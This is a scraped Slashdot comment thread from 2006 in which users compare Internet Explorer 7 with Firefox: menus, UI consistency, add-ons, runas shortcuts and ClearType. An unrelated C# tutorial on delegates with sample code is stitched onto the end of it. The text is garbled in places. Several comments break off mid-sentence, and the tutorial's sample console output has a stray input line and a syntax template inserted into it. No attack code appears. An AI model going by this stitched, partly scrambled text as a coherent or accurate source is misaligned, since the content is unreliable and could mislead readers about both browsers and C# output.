Yes, they hid the menu bar by default. I love my screen real-estate, so I think this is great idea. And you know what? I dont need the menu bar. Not for anything I do at all often. File menu? It's almost all under the Page button in the command bar. Tools menu? Take a guess which command button that is... Basically, the menus are only there for backward compatibility; many users will stick to
"long-time Firefox user" (Score:3, Interesting)
The majority of the older mozilla userbase is on linux, think back to when mozilla was the default browser in debian, red hat, suse. only with firefox 1.0 did the development shift from this technical userbase to the hysterical evangelicals of firefox vs IE.
Why do I care about limited platform support? (Score:2, Insightful)
On the otherhand, close integration between the OS and the browser can make for a more seamless experience (and DOJ interactions). IE 7 works on 75+% of the PCs in the world and probably nearly 100% of the PCs in companies with more than 500 employees.
slow (Score:2, Interesting)
Why I like IE7 (Score:3, Interesting)
Anyone actually expecting a firefox to Like 7? (Score:3)
That reason we leave is the exact reason why we will never return to IE, even with a great interface. We know track history for the company, and even if IE7 looks like it's bug free, we'll know there's memory leaks, crashes around the corner or what ever. It doesn't even matter if they EXIST, we will believe it has these problems just because we left IE for a reason.
There might be a few people who leave Firefox for IE especially since Firefox loses a little extension support with it's new version but we're not going to suddenly be like forgetting every reason we avoid Microsoft products.
Re: (Score:2)
Non-standard UI is a non-issue (Score:3, Insightful)
The screenshots make MSIE look bizarre to me, but I am very sceptical that this will really put MS at any sort of disadvantage. To make a joke, here: they're just copying Apple again.
In the last 5 years or so, Apple has gone absolutely apeshit with apps that totally defy their earlier style guidelines. Nobody talks about MacOS's "consistent experience" anymore. What price did Apple end up paying for this? None. Did as many people leave MacOS in protest over the bizarre UIs, as migrated to MacOS after saying "ooh, shiney!!!"? Hell no. Nobody protested at all, except usability nerds, and we all know they have sticks up their butts, anyway.
;-)
Microsoft has probably learned something about human nature over the years. And perhaps one lesson they've learned, is that making bizarre arbitrary changes to UIs, is a good way to make people think something is "new and improved." It worked for Apple, so it will probably work for Microsoft.
Re: (Score:2)
There are two points with the metal interface. The first is that the gray color just vanishes when browsing or watching videos; it doesn't compete with the colors of the video. Compare that to WIE7's "interface", which looks like a fucking christmas tree or pile of candy.
The other point is that just plain gray is something that you associate with Windows; it still has to be slick and stylish. Th
IE7 is a functional browser, but not much else (Score:5, Insightful)
IE7 is far less integrated to the OS like IE6 was. Or at least it seems so. It used to be that you could open web addresses in My Computer and Explorer would "become" IE and navigate to the address. Now, doing the same thing triggers a Firefox window to open and navigate to the address, since Firefox is set to my default browser. Not a bad feature here, but interesting.
Another issue that I personally have, but won't apply to many others, is using a runas shortcut to get to Explorer. I used to have a shortcut that used runas to open IE6 as an administrator. Then I could type "Control Panel" or C:/ and go about my business with an admin window while still logged in as my normal restricted user. Very convenient and I rarely found myself logging on as an administrator to do anything. With IE7, it's merely a browser and you can't (that I've seen) get to the control panel or navigate the file system with it. If you type in C:\ for example, IE7 will open another Explorer window to the C: drive. What's really odd, though, is that this new window opens with the permissions of my restricted user even though the IE7 window was running as an administrator. Usually (or in the past) a window opened would inherit the user permissions of the parent. (FYI, pointing the runas shortcut to Windows Explorer doesn't work, nothing opens.)
Other than those issues, there's really no problems. It's a functional browser and not much else.
What misses the mark, though, is the majority of the add-ons for IE. I got excited once I started reading over the list until I realized most of the were not free. Paying for add-ons? Are you kidding me? Even the ones that are free sound good, but miss the mark when compared to similar add-ons that I'm familiar with.
There's an IESpell add-on that'll spell check text areas for you. Instead of underlining misspelled words like their Office app (and Firefox 2.0) does, you have to click a button to spell check the text areas for you. Functional, but annoying.
There's an InlineSearch add-on that'll find words as you type, ala Firefox or whoever had it first (I don't care who). However, instead of just searching as you type, you have to press Control-F first to open the search dialog along the bottom of the page. Maybe this is better for some people, but if you're going to copy something and make it different, at least give the option to make it behave like whatever you copied. The other problem with this add-on is that is only installs for the user who runs the
There's there's Fiddler which promises to be like LiveHTTPHeaders in Firefox. For the most part it is, but again, it just misses the mark. First, it's just another program and other than capturing HTTP requests that IE makes, I don't see how it's really an add-on for IE. Second, a big feature of LiveHTTPHeaders (and others, I'm sure) is that you can replay HTTP requests after modifying any of the request headers and see the results in the browser. Unless I missed something, Fiddler let's you replay the modified HTTP request, but only shows you the raw HTML response, instead of actually loading it into a browser window. Functional, but annoying.
There are others that are annoying, too, mostly be requiring administrator permissions for some obscure installation folder, but some are good. The NoMoreCookies add-on is useful since IE7's cookie management is non-existent. I did not find any way to delete individual cookies or view their contents. There's a DevToolbar that has some useful features, too.Not that I have a use for them, but there are StumbleUpon and MouseGesture add-ons for IE7, to
great summary (Score:4, Insightful)
I bet the IE guys are microsoft read the article and are sulking about how their browser isn't ready to take on the competition. Oh well, I guess they can always take solace in their 88% market share.
Mod parent Funny (Score:3, Funny)
I mean:
and:
Re: (Score:2)
This isn't about what browser is best, it's about this little clique who feels superior to IE users while ignoring the fact that Firefox is a better product overall.
See I can insert any browser into that statement and it still sounds like trolling. Opera fanboys can have their browser. Go for it. I even included Opera in MidnightBSD mports. P
Re:For non-standard...see Mac OS (Score:2)
Re: (Score:2)
There are a limited number of reasons to support a six year old, soon to be two generation old operating system. In addition, I think that there are probably a number of technical reasons why it "can't be done" namely the fact that there is no XP SP2 equiavlent update for w2k.
Also, Microsoft would be just a little crazy to continue throwing money at the one useful OS that does not require activation.
Not saying I don't think w2k is decent OS, and certainly not on its "last legs".
Re: (Score:2)
Read TFA the entire thing is an opinion piece, there are no bugs mentioned, there are were no technical differences mentioned, which is why I bothered to write this in the first place.
There are no benchmarks for page loading. There are no side by side comparisons of features. Just broad, vague statements about how IE has a long way to go compared to FF and Opera.
The issue that the author brought
Re: (Score:2)
If you read farther up, that's because IE7 uses ClearType [microsoft.com] to smooth out the letters. You can install ClearType as an XP PowerToy from MS, too, so it'll apply system wide (including Firefox).
---John Holmes...
Re: (Score:2) | https://slashdot.org/story/06/10/24/1836218/ie7-from-a-firefox-users-perspective | CC-MAIN-2017-13 | refinedweb | 4,482 | 71.04 |
AuroraDNS DNS driver documentation¶
PCextreme B.V. is a Dutch cloud provider. It provides a public cloud offering under the name AuroraCompute. All cloud services are under the family name Aurora.
AuroraDNS is a highly available DNS service which also provides health checking.
Records can be attached to a health check. When this health check becomes unhealthy this record will no longer be served.
This provides the possibility to create loadbalancing over multiple servers without the requirement of a central loadbalancer in the network. It is also provider agnostic, health checks can point to any IP/Host on the internet.
Instantiating a driver¶
When you instantiate a driver, you need to pass a your
key and
secret
to the driver constructor. These can be obtained in the control panel of
AuroraDNS.
For example:
from libcloud.dns.types import Provider from libcloud.dns.providers import get_driver cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret')
Disabling and enabling records¶
Records in can be disabled and enabled. By default all new records are enabled, but this property can be set during creation and can be updated.
For example:
from libcloud.dns.types import Provider from libcloud.dns.providers import get_driver cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret')
In this example we create a record, but disable it. This means it will not be served.
Afterwards we enable the record and this make the DNS server serve this specific record.
Health Checks¶
AuroraDNS has support for Health Checks which will disable all records attached to that health check should it fail. With this you can create DNS based loadbalancing over multiple records.
In the example below we create a health check and afterwards attach a newly created record to this health check.
For example:
from libcloud.dns.types import Provider, RecordType from libcloud.dns.providers import get_driver from libcloud.dns.drivers.auroradns import AuroraDNSHealthCheckType cls = get_driver(Provider.AURORADNS) driver = cls('myapikey', 'mysecret') zone = driver.get_zone('auroradns.eu') health_check = driver.ex_create_healthcheck(zone=zone, type=AuroraDNSHealthCheckType.HTTP, hostname='web01.auroradns.eu', path='/', port=80, interval=10, threshold=5) record = zone.create_record(name='www', type=RecordType.AAAA, data='2a00:f10:452::1', extra={'health_check_id': health_check.id})
API Docs¶
- class
libcloud.dns.drivers.auroradns.
AuroraDNSDriver(key, secret=None, secure=True, host=None, port=None, **kwargs)[source]¶
ex_create_healthcheck(zone, type, hostname, port, path, interval, threshold, ipaddress=None, enabled=True, extra=None)[source]¶
Create a new Health Check in a zone
ex_update_healthcheck(healthcheck, type=None, hostname=None, ipaddress=None, port=None, path=None, interval=None, threshold=None, enabled=None, extra=None)[source]¶
Update an existing Health Check
export_zone_to_bind_zone_file(zone, file_path)¶
Export Zone object to the BIND compatible format and write result to a file. | https://libcloud.readthedocs.io/en/latest/dns/drivers/auroradns.html | CC-MAIN-2017-43 | refinedweb | 445 | 52.36 |
JComboBox with horizontall scroll bar
jack morton
Greenhorn
Posts: 16
Brian Cole
Author
Ranch Hand
Ranch Hand
Posts: 907
1
jack morton wrote:I created this custom ComboBox:
When i add this ComboBox to a Frame, it has a look and feel diffrent from the others componet
How to resolve that
If you know what L&F will be used, you can override the specific ComboBoxUI for that L&F (though it may have a structure that differs from BasicComboBoxUI, which can make it difficult). Of course it's typical to expect your code to be run under a variety of L&Fs.
This is a general problem with Swing. For this reason you don't really want to override UIs to change functionality, though sometimes there's no other way. I just spent a few minutes looking for some example code I saw somewhere that uses crazy reflection techniques to (effectively) override a method in a dynamic UI delegate, but I couldn't find it. The technique probably wouldn't have worked for your situation anyway.
[edit: spell delegate correctly]
Just another cross poster.
luck, db
There are no new questions, but there may be new answers.
Carlos Hoces
Greenhorn
Posts: 2
jack morton wrote:Hi all,
I created this custom ComboBox:
[code]import com.sun.java.swing.*;
import com.sun.java.swing.plaf.basic.*;
public class myCombo extends JComboBox{
public myCombo(){
super();
setUI(new myComboUI());
}
Jackm
In case you extend your class, like:
public class HComboBox extends myCombo{
public HComboBox(){
this.updateUI();
...
}
will set the current LaF during the execution of your class constructor.
This is how I use it, and it works well with Substance LaF, ie.
I guess if you do the same with your class, as is, it'll work equally well.
| http://www.coderanch.com/t/432788/GUI/java/JComboBox-horizontall-scroll-bar | CC-MAIN-2016-30 | refinedweb | 297 | 58.42 |
Redux Saga: Finishing the Clock Demo App
Implementing Saga Code
This is the third and final post in a three-part series about Redux Saga. In the first post, we warmed ourselves up to the general concepts involved. In the second, we took our relationship with Saga to the next level. We made it real. And we felt like the only developer in the room. We thought it was different this time. We thought...we were special. In this final post of the series, we are going to write the rest of the app. If you haven't already, you can clone the starter repo from this url. If you just want to skip to the final product, go ahead and check out its repo on github and live demo here.
What's my name again?
In the last post, we considered our basic yet kind of non-trivial requirements, to create a rudimentary clock that responds to some user interactions, and for some frakking reason we chose to use a bleeding-edge, space-age tech stack to achieve this. Oh yeah, it was to learn the basics of Redux Saga. Right. Cool. We took a shot of Norseman Vodka (Minneapolis, MN) and chased it with La Croix Pamplemousse flavor carbonated water, which is, of course, the best flavor of La Croix. (Edit: apparently, some Facebook developer agrees with me.) We then cloned our boilerplate repo, took another fine sip of Norseman, and began writing some code.
We determined that our minimum redux state for the app could consist of a single field, "milliseconds," to represent the clock's time. Since our clock needs to run forward, backward and be reset, we created corresponding redux actions to increment, decrement and reset the milliseconds field in state. We then jumped boldly into some saga code, creating a saga that listens for three saga actions (start, pause and rewind) and just logs them out when it receives them. Eventually, our plan is to replace this logging of actions with a process that runs the clock, sending out a decrement action every second, for example, and thus side-effecting the app state in a strictly defined way. Finally, we created a plain-jane React component to let us test drive our redux and saga actions and see that the state updates accordingly and our saga code works as expected.
Now we're going to finish this thing. We want it to look kinda cool so it impresses our friends and is fun to look at and engaging and shit, so we'll use some cool SVG techniques to make the clock draw itself as its time increments. But most importantly, we'll use Saga to make our app sing and dance. Let's start with that.
Implementing the saga
Our duck.js module is pretty minimal, and we actually only need a few more lines of code to finish the saga/redux side of our app. So far, in the "saga" part of our duck, we have this:
export function* rootSaga () { yield takeLatest(['start-clock', 'pause-clock', 'rewind-clock'], handleClockAction) } function* handleClockAction ({ type }) { console.log('Pushed this action to handleClockAction: ', type) }
As we discussed in the previous post,
takeLatest will listen for an action type or array of action types and run another process (in our case,
handleClockAction) each time an action with a matching type is fired. It will also cancel any running process it had previously started. This is important to remember for later on. Also,
takeLatest passes the full action object, which is why we can use that in
handleClockAction.
Now let's think about how this thing should work. All the excitement is really going to be in
handleClockAction, and we will want to do something different for each of our three saga actions. Let's stub out that basic structure in the code. Replace the single line in
handleClockAction with an
if/else if block that hits a different branch of the
if/else if for each action type and then logs out some arbitrary text to prove that we hit the right code.
I'll give you a second on that...
...still waiting patiently...
..alright, hurry it up!
Done? OK, good. Here's what my
handleClockAction looks like:
function* handleClockAction ({ type }) { if (type === 'start-clock') { console.log(`Received ${type}. We need to run the clock forward here.`) } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } else if (type === 'pause-clock') { console.log(`Received ${type}. Guess what needs to be done here?`) } }
Now run the app (npm start), go to localhost:8080, open up the javascript console and test out the saga actions (they're wired up to those buttons underneath the SVG). We see the appropriate message logged out for each action. Sweet. So now we just need to figure out what to do when we receive each action.
When we get the start clock action, we want to increment the clock every 100 milliseconds. For that, we can pull in a little helper from saga called "delay." Edit your import from redux-saga so it looks like this:
import { delay, takeLatest } from 'redux-saga'
Delay is so simple as to be self-explanatory. It takes one argument, number of milliseconds, and then pauses execution for that amount of time, a la
yield delay(50). Let's add some logic to the branch of our
if/else if that logs to the console every 1000 ms. Remember that you want this to repeat indefinitely. We can use a simple, native javascript control flow structure in order to implement this...I'll let you guess what it is.
No peeking.
Take a minute and try some ideas out.
OK, Here's what I have:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) console.log(`Received ${type}. We need to run the clock forward here.`) } } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } else if (type === 'pause-clock') { console.log(`Received ${type}. Guess what needs to be done here?`) } }
At this point, it's incredibly informative to go to your browser with the javascript console open and play with the saga actions, looking at what gets logged out. You'll see that the start clock action does indeed pause for 100 ms then log something out then repeat indefinitely. Also, notice the very crucial fact that whenever our
takeLatest in the root saga receives a new matching action, it cancels the currently running
handleClockAction. Since we need to do nothing but cancel any current clock action when the pause clock action is received, guess what we can do? Delete some code! Pause clock will automatically work because
takeLatest cancels the current
handleClockAction, stopping the clock whether it's running forward or backwards. Make sure you understand this key feature of
takeLatest. Make the appropriate changes in
handleClockAction. You should now have something like this:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) console.log(`Received ${type}. We need to run the clock forward here.`) } } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } }
Now let's get really wild and actually dispatch an action within the while loop. Whoa.
(Side note: we aren't actually dispatching an action, we're just requesting that the middleware do so. But don't worry about that just yet, I'll explain it later.)
To dispatch an action within a saga, we'll use the
put side effect. Add the following line to the top of your duck file:
import { put } from 'redux-saga/effects'
To request that an action be dispatched with
put, we just use this simple syntax:
yield put({ type: 'hi', data: 'I am an action' }). That means, of course, that we can invoke an action creator that returns a plain object within the put like this
yield put(someAction()). (Function arguments are evaluated immediately in javascript.) Hey, remember those redux actions we created way back at the beginning of the app? Let's use one. Go to the while loop in
handleClockAction and give
put a test drive:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { console.log(`Received ${type}. We need to run the clock backwards here.`) } }
Go try it in your browser. Notice that the clock time shown underneath the SVG is actually incrementing. Funk yeah.
To run the clock backwards, we can reuse most of the code from start clock. Go ahead and try it out.
Did you write the code? Is it working? Toil away a bit longer if you need to.
Here's what you should have:
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(1000) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { while (true) { yield delay(1000) yield put(decrementMilliseconds()) } } }
Now go test out all the saga actions and make sure everything behaves correctly. If it doesn't, that means you're a failure as a developer. Just kidding, of course :-) In all seriousness, if you get stuck at any point on this or any other article on my blog, leave a comment, and I'll be happy to help you out.
This is a great moment to play with the saga code and learn by experimentation. One hint:
delay is blocking, while some other effects are not. Try your hand at a
for loop. Or maybe change the
while condition to be false at some point. We've abandoned the world of promises, and now we can express all of our control flow with these simple, predictable, native javascript structures.
OK, undo any experimental changes in your saga code so that it looks like my code snippet above again.
So with that, our saga code is fully complete and operational. (Note: in the final, completed repo, I've reorganized the code a bit to make it read more clearly.)
Saga's approach to side-effects
OK, now that we've gotten some work done, let's talk about how the code works. The core idea in Redux Saga is this: we don't actually perform side-effects like dispatching to the store in our code. Instead, we yield descriptions of side-effects to the saga middleware, and the middleware performs them. Essentially, we are giving instructions back to Saga telling it what we want to happen. These side-effect descriptions are all plain objects that conform to the standard generator output of
{ value: any, done: boolean }, like we discussed in the first post of this series. For example,
yield put sends a plain object back out to the middleware containing an action object for the middleware to dispatch for us. Defining our async flows this way has some big benefits, one of them being testability. We can simply assert that our sagas are yielding the correct side-effect descriptions back to the middleware at each of their steps. (Keep your eye out for a future post that covers saga testing in-depth.)
That said, we should make one tiny update in the interest of following redux-saga best practices: add
call to your imports from redux-saga/effects and change the
yield delay(100) to be
yield call(delay, 100). Since we want to only yield side-effect descriptions back to the saga middleware, saga provides the
call effect to basically convert non-effects into effects. Instead of just yielding to
delay itself (a promise), we convert
delay to an effect via
call and yield that. We should give the same treatment to anything we
yield within saga code that isn't already a saga effect (anything not imported from
redux-saga/effects). The syntax for
call is just the function to invoke and the list of arguments to pass to it. For example:
yield call(fetch, url, options). Lastly, note that
call can be used for promises, generators or functions.
make this thing not so ugly
We need to create a file that will serve as the config for our app, holding some arbitrary constants. Why not call it "config.js"? Create the file in src/, and paste in these contents:
const MAX_RADIUS = 40 let hands = [ { ms: 144000, maxTicks: 1 }, { ms: 36000, maxTicks: 4 }, { ms: 12000, maxTicks: 3 }, { ms: 2000, maxTicks: 6 }, { ms: 400, maxTicks: 5 }, { ms: 100, maxTicks: 4 } ] export const STROKE_WIDTH = MAX_RADIUS / hands.length hands = hands.map((hand, idx) => { const radius = STROKE_WIDTH * (hands.length - idx) return { ...hand, radius, circumference: 2 * Math.PI * radius, alpha: 1 - idx / hands.length } }) export const CLOCK_HANDS = hands export const MINIMUM_MS = 100
OK, so what's going on here? Let me explain. It's a bunch of constants and calculations that will determine how exactly our SVG looks. Happy? Good. (You can dissect this on your own if you wish, but I won't get into it here since it's a little too off topic.)
OK, so now our saga code is in place and we've defined all of the configuration needed for our SVG. Let's finish off app.jsx with some updates to make the SVG more interesting.
FINISH HIM
Here's what we have currently in app.jsx:)
We need to pull in our exports from the config and pass them as props to the component. While we're at it, we can delete some unneeded imports from the duck. We're no longer going to call certain actions directly, since they will only be fired within our saga. Update the top of your file like so:
import React from 'react' import { connect } from 'react-redux' import { startClock, rewindClock, pauseClock, resetClock } from 'duck' import { CLOCK_HANDS, STROKE_WIDTH } from 'config'
So now we have all the data we need to make pretty circles within our SVG. Essentially, we are going to use a series of concentric circles to represent arbitrary hours/minutes/seconds (but with the arbitrary definitions from our config), and change the "length" of each circle so that it increases from 0 to 100% as time passes. To do the SVG drawing, we use a simple little trick explained in this CSS Tricks blog post.
We're no longer going to pass the milliseconds field from state as props. Instead, on every update to milliseconds, we're going to calculate the position for each clock hand. This is just some boring ol' mathy stuff. Basically, we iterate over each hand, largest to smallest, and put as much time on it as we can, and then repeat the process on the next hand, passing the remaining time. The smallest hand corresponds to our smallest unit of precision, 100 ms (
MAXIMUM_MS in config.js). Update your
connect call to look like this:
export default connect(state => { const currentTime = state.milliseconds let remainingTime = currentTime const getTicks = (hands, timeRemaining) => { let [hand, ...tailHands] = hands hand.ticks = Math.floor(timeRemaining / hand.ms) return tailHands.length ? [hand, ...getTicks(tailHands, timeRemaining % hand.ms)] : [hand] } const hands = getTicks(CLOCK_HANDS, remainingTime) .map((hand, idx) => { const offset = state.milliseconds >= hand.ms ? 1 : 0 const position = hand.circumference - ((hand.ticks + offset) / hand.maxTicks * hand.circumference) return { ...hand, position } }) return { hands } }, ({ startClock, rewindClock, resetClock, pauseClock }))(Clock)
Now we need to pull in the new
hands prop in our component. Update the destructured assignment of props in the render method:
render () { const { hands, startClock, rewindClock, resetClock, pauseClock } = this.props
For the grand finale, we'll make one final change. We're going update our SVG to start the clock
onMouseEnter, rewind
onMouseLeave, and pause
onClick. Go ahead and plug in those changes.
I'll wait. I need to go get some vodka. Tonight, I'm side-by-side tasting Norseman and Tattersall vodkas. brb
Mmmmmm....de-lish. The Tattersall vodka has a slightly creamy flavor along with a subtle sweetness, and a more prominent "boozy" character. The Norseman is still much smoother, if not overly minimal for some tastes, with its own sweet undertone and crisp bite with a faint hint of citrus.
OK, you got those changes done? Good. Now we're going to create the concentric circles within the SVG. We need to iterate
hands and create a
<circle/> SVG element for each one, using our calculated values to set the radius, circumference, position and transparency for each hand. If you fancy yourself an SVG wizard, go ahead and make these changes on your own.
Here's our final update. This is what you should be returning from
render():
return ( <svg onMouseEnter={ startClock } onMouseLeave={ rewindClock } onDoubleClick={ resetClock } onClick={ pauseClock } { hands.map((hand, index) => { const { radius, circumference, position, alpha } = hand return ( <circle key={ index } cx="50" cy="50" r={ radius } stroke={ `rgba(1,1,1,${alpha})` } fill="none" strokeWidth={ STROKE_WIDTH } strokeDasharray={ circumference } strokeDashoffset={ position } /> ) }) } </svg> )
Shit, I forgot something. Go over to duck.js, and import MINIMUM_MS from config:
import { MINIMUM_MS } from 'config'
Now replace the
1000 in the delay calls with
MINIMUM_MS. The clock is going to tick every 100 ms.
function* handleClockAction ({ type }) { if (type === 'start-clock') { while (true) { yield delay(MINIMUM_MS) yield put(incrementMilliseconds()) } } else if (type === 'rewind-clock') { while (true) { yield delay(MINIMUM_MS) yield put(decrementMilliseconds()) } } }
See how easy it is to change control flow logic in saga?
Whip Out Your Clock
Now let's give this thing a whirl.
npm start and open up localhost:8080 in your browser.
There you have it. A working clock that we can pause, resume, run forwards and backwards and reset. And it's even kind of cool looking.
The End
Thanks for reading this tutorial! We covered the basics of javascript generators and Redux Saga in the context of a small demo app. I hope I've helped you understand how to use Redux Saga, as well as the benefits and reasoning behind it.
If you want to learn more about Redux Saga, here are a handful of great tutorials you can check out. These helped me immensely when I was first starting to learn saga:
Most importantly and obviously, the tutorial in the Redux Saga official docs is invaluable. This is the first thing you should read (and read all of it):
Niels Gerritsen's intro to Redux Saga. This is one of the first things I read about saga, and its clear language really helped me past the conceptual hurdles:
This tutorial by Joel Hooks, which walks you through a digestible, concrete example (like I tried to do here):
Jack Hsu's article on saga vs thunk for managing side-effects (my use case here is basically an extension of his):
I'd also like to credit the authors of the following articles that demystified generators, whose crystal clear, insightful explanations inspired me to write this series, and without which I would probably still be trying to figure out what the fuck a generator is:
David Walsh Blog's excellent introduction to ES6 generators, written by Kyle Simpson:
Axel Rauschmeyer's exhaustive (as always) article on ES6 generators:
Thanks for reading! See you next time. | http://ohyayanotherblog.ghost.io/redux-saga-finishing-the-clock-demo-app/ | CC-MAIN-2017-43 | refinedweb | 3,176 | 72.36 |
Source code of main inside exe
I just checked the strings contained in an exe compiled on windows supposedly in release (qt creator+vs2017) and I can see the source code of the main.
What I am doing wrong?
Thank you in advance
Emanuele
- sierdzio Moderators last edited by
What I am doing wrong?
If you mean you can see method names: you are doing nothing wrong, this is normal.
If you want to hide them, use some C+ obfuscation technique / software.
No, I mean I can see the entire source code of the main.
I used this:
on my exe and I can see the entire source code of the main:
#include <QApplication>
#include <QCommandLineParser>
....
Yes, I also see some method names, but this is not a big problem.
- sierdzio Moderators last edited by
No idea then, that's weird.
- jsulm Qt Champions 2018 last edited by
@3cxitalydev Did you check the build log to see how the compiler was called (what parameters were passed to it)?
- VRonin Qt Champions 2018 last edited by
You probably compiled in debug mode. Try switching to release and see if the same happens
Hi,
many thanks to all of you.
At the end I discovered that I added by mistake the main as resource file... :(
Sorry for bothering you.
Emanuele
- aha_1980 Qt Champions 2018 last edited by
@3cxitalydev Glad you figured it out.
Then please mark this topic as SOLVED. Thanks. | https://forum.qt.io/topic/105217/source-code-of-main-inside-exe/8 | CC-MAIN-2019-43 | refinedweb | 239 | 81.83 |
class HelloWorld { public static void main(String[] args) { System.out.writeln("Hello, world") } }A class that will never become an object, with one method, which I have to specify is public, static, and has a return type. Compare to PythonLanguage
print( "Hello, world!" )Or, if you want import-ability:
def hello_world(): print("Hello, world!") if __name__ == "__main__": hello_world()Isn't this only an issue if you never write programs more complex than print("Jello, Whirled")? Well, I wish that at least the compiler were smarter. If I could write main {...} or void main() {...}, it would be OK, but I have to put that it has a return type, which must be void or the program crashes. I mean, the thing is, all of these don't work:
class Complex { public float real, imag; void Complex(float _real = 0, float _imag = 0) { real = _real; imag = _imag } // add/subtract/mul/div methods not defined because they are not really important to the example. public static void main(String[] args) { if (new Complex(1, 1).add(new Complex(-1, -1).equal(0)) system.exit(0) system.exit("Unit test failed.") } }All right, I guess, but...bleah. On the other hand, it clearly distinguishes the special case of launching a program -- for which String[] args exists and may be parsed -- from instantiating a class. The alternative would be to require any "launch-able as program" class to define of a special constructor that accepts, say, a single parameter of Object[] args. That would not be significantly different from public static void main(String[] args), except to force instantiation of an object, which may be pointless overhead if the user has supplied invalid arguments. That's exactly it. I'd rather just write the code, and I'd rather it not all of it be in classes--some of which have no purpose in instantiation. [There is more than one such alternative. A bit of reflection could allow parsing command-line arguments based on the types accepted by constructors and methods and such.] True. Feel free to r/The/An/. It would potentially subject users to a wonderfully unhelpful "No matching constructor or static method found for the supplied arguments" or similar error message, though I suppose the error could be trapped and transformed into something friendlier. And it would benefit from additional syntax to exclude constructors and methods not intended for program launch, but that might inadvertently be invoked by the right combination and/or type of command-line arguments. Oh, and if the users enters 'program 3' at the command-line and there's both 'program(int x)' and 'program(String x)' constructors, which one gets invoked? What if the user enters 'program "3"'? And so on. On the other hand, it makes instantiation within the application homologous to instantiation from outside the application. Dunno... The yuck piles up quickly. | http://c2.com/cgi-bin/wiki?PublicStaticVoidMain | CC-MAIN-2015-27 | refinedweb | 477 | 56.25 |
Describes the visual structure of a data object.
Public Class DataTemplate _
Inherits FrameworkTemplate
Dim instance As DataTemplate
public class DataTemplate : FrameworkTemplate
<DataTemplate ...>
templateContent
</DataTemplate>
The tree of objects that defines this DataTemplate. The tree must have a single root element, and that root element can have zero or more child elements.. For more information, see ContentControl..::.ContentTemplate.
You can place a DataTemplate as the direct child of an object.ItemTemplate property element..
The following example uses a DataTemplate in display the items of a ListBox. In this example, the ListBox is bound to a collection of Customer objects. The DataTemplate contains TextBlock controls that bind to the FirstName, LastName, and Address properties. For more information on data binding, see Data Binding.
"));
}
}
For a list of the operating systems and browsers that are supported by Silverlight, see Supported Operating Systems and Browsers. | http://msdn.microsoft.com/en-us/library/system.windows.datatemplate(VS.95).aspx | crawl-002 | refinedweb | 142 | 51.14 |
Signals:
Each signal defined by the system falls into one of five classes:
Macros are defined in
<signal.h> header file for common signals.
These include:
Signals can be numbered from 0 to 31.:
#include <stdio.h>
#include <signal.h>
void sigproc(void);
void quitproc(void);
main()
{ signal(SIGINT, sigproc);
signal(SIGQUIT, quitproc);
printf("ctrl-c disabled use ctrl-\\ to quit\n");\n");
exit(0); /* normal exit status */
}.
An example of communicating process using signals is sig_talk.c:
/* sig_talk.c --- Example of how 2 processes can talk */ /* to each other using kill() and signal() */ /* We will fork() 2 process and let the parent send a few */ /* signals to it`s child */ /* cc sig_talk.c -o sig_talk */ #include <stdio.h> #include <signal.h> void sighup(); /* routines child will call upon sigtrap */ void sigint(); void sigquit(); main() { int pid; /* get child process */ if ((pid = fork()) < 0) { perror("fork"); exit(1); } if (pid == 0) { /* child */ signal(SIGHUP,sighup); /* set function calls */); } } void sighup() { signal(SIGHUP,sighup); /* reset signal */ printf("CHILD: I have received a SIGHUP\n"); } void sigint() { signal(SIGINT,sigint); /* reset signal */ printf("CHILD: I have received a SIGINT\n"); } void sigquit() { printf("My DADDY has Killed me!!!\n"); exit(0); } | http://www.cs.cf.ac.uk/Dave/C/node24.html | CC-MAIN-2015-22 | refinedweb | 199 | 63.09 |
Delegates
Delegates are types that hold references to methods instead of variables. A delegate can copy the behavior of any method. To declare a delegate, you use the delegate keyword. Declaring a delegate is similar to declaring a method except that it has no body. It has a return type and a set of parameters just like a method. These tells the type of method it can hold. Below shows the syntax of declaring a delegate.
delegate returnType DelegateName(dt param1, dt param2, ... dt paramN);
The following example program shows how to use and the benefits of using a delegate.
using System; namespace DelegatesDemo { public class Program { delegate void ArithmeticDelegate(int num1, int num2); static void Add(int x, int y) { Console.WriteLine("Sum is {0}.", x + y); } static void Subtract(int x, int y) { Console.WriteLine("Difference is {0}.", x - y); } static void Main() { ArithmeticDelegate Operation; int num1, num2; Console.Write("Enter first number: "); num1 = Convert.ToInt32(Console.ReadLine()); Console.Write("Enter second number: "); num2 = Convert.ToInt32(Console.ReadLine()); if (num1 < num2) { Operation = new ArithmeticDelegate(Add); } else { Operation = new ArithmeticDelegate(Subtract); } Operation(num1, num2); } } }
Figure 1
Enter first number: 3 Enter second number: 5 Sum is 8
Enter first number: 5
variable = new DelegateName(MethodName);
Enter second number: 3 Difference is 2
Line 7 is the declaration of our delegate. We used the delegate keyword to indicate that it is a delegate. The following is the return type of the method it will accept. The naming practice for a delegate is the same with the method, we used Pascal Casing. We also append the word “Delegate” for better recognition. We defined the parameters of the delegate which will also be the same with the parameters of the method it will hold. The delegate that was declared in line 7 can only accept references to methods that has a void return type (no return type) and has two int parameters.
After defining the delegate, we defined two methods with exactly the same signature as the delegate because they are the methods the delegate will use later. Both methods don’t return a data and both accepts 2 int arguments. Inside the Main method, we declared a variable with the type of the delegate we defined (line 21). This variable will hold a reference to a method that matches the delegate’s signature.The program asked for two values from the user. We entered an if statement in line 31 wherein, if the value of the first number is less than the second number, then we add them. If the value of the first number is greater than or equal to the number, we subtract them. To assign a method to the delegate, we follow this syntax:
When assigning a delegate with a reference of the method, we use the new keyword followed by the name of the delegate. Inside the parentheses, we indicate the name of the method the delegate will refer to. A much simpler way is you can just assign the name of the method to the delegate variable.
Operation = Add; Operation = Subtract;
